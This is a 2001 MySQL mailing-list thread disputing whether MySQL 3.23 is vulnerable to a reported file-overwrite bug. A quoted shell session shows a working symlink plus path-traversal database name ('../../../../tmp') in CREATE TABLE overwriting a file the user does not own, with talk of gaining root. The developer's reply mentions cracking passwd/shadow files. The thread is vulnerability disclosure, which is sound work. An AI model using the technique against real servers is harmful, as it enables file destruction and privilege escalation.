Benjamin Pflugmann writes:
> Hi.
>
> On Tue, Mar 20, 2001 at 12:22:19PM +0100, [EMAIL PROTECTED] wrote:
> > Hi!
> >
> > On Mar 20, Basil Hussain wrote:
> > > Hi all,
> > >
> > > The original message below was posted to the BugTraq mailing list. Have the
> > > developers seen this? I know it talks about version mysql-3.20.32a (which is
> > > ancient), but he mentions that it affects other versions.
> > >
> > > Anyway, I don't run my MySQL server as root, so I'm not worried. :)
> > >
> >
> > You shouldn't.
> >
> > MySQL-3.23 is not vulnerable.
>
> How did you determine that?
>
>
> Sorry to contradict, but have a look:
>
> newton:~> mysql -u root -e "select version()"
> +-----------+
> | version() |
> +-----------+
> | 3.23.33 |
> +-----------+
> 8:26:25 newton:~> sudo -u mysql touch /tmp/test # just created a file owned by
>mysql-user
> 8:26:45 newton:~> ln -sf /tmp/test /tmp/yikes.MYI
> 8:26:54 newton:~> ls -l /tmp
> [...]
> -rw-r--r-- 1 mysql mysql 0 Mar 21 08:26 test
> lrwxrwxrwx 1 philemon philemon 9 Mar 21 08:28 yikes.MYI -> /tmp/test
> 8:26:57 newton:~> mysql ../../../../tmp -e "create table yikes(w int(4))"
> 8:27:02 newton:~> ls -l /tmp
> [...]
> -rw-r--r-- 1 mysql mysql 1024 Mar 21 08:28 test
> -rw-rw---- 1 mysql mysql 0 Mar 21 08:28 yikes.MYD
> lrwxrwxrwx 1 philemon philemon 9 Mar 21 08:28 yikes.MYI -> /tmp/test
> -rw-rw---- 1 mysql mysql 8548 Mar 21 08:28 yikes.frm
>
> So, I have just overwritten a file not owned by me, namely /tmp/test.
> If mysql was running as root (which is of couse deprecated), I could
> overwrite any file in the system this way and even gain root access
> (as shown by someone on bugtraq), I think.
>
> Did I overlook something?
>
> So, it looks to me, that at least 3.23.33 is not secure in this way (I
> have not compared 3.23.34 resp. 3.23.35 because for both problems were
> reported preventing them from use in production systems).
>
> Even without MySQL running as root, I can do a lot of harm (with
> privilege to create tables, I can probably gain MySQL root privileges,
> delete any other table, delete configs and log files and so on).
>
> Bye,
>
> Benjamin.
>
>
Hi!
Running mysql as root is not safe.
Next, you had full shell access, with which you can accomplish
practically anything. Just take a look at passwd or shadow file, crack
it and you can have what ever you want.
Last but not least, there is another matter. CREATE and FILE
privileges also should not be granted lightly.
Regards,
Sinisa
____ __ _____ _____ ___ == MySQL AB
/*/\*\/\*\ /*/ \*\ /*/ \*\ |*| Sinisa Milivojevic
/*/ /*/ /*/ \*\_ |*| |*||*| mailto:[EMAIL PROTECTED]
/*/ /*/ /*/\*\/*/ \*\|*| |*||*| Larnaca, Cyprus
/*/ /*/ /*/\*\_/*/ \*\_/*/ |*|____
^^^^^^^^^^^^/*/^^^^^^^^^^^\*\^^^^^^^^^^^
/*/ \*\ Developers Team
---------------------------------------------------------------------
Before posting, please check:
http://www.mysql.com/manual.php (the manual)
http://lists.mysql.com/ (the list archive)
To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
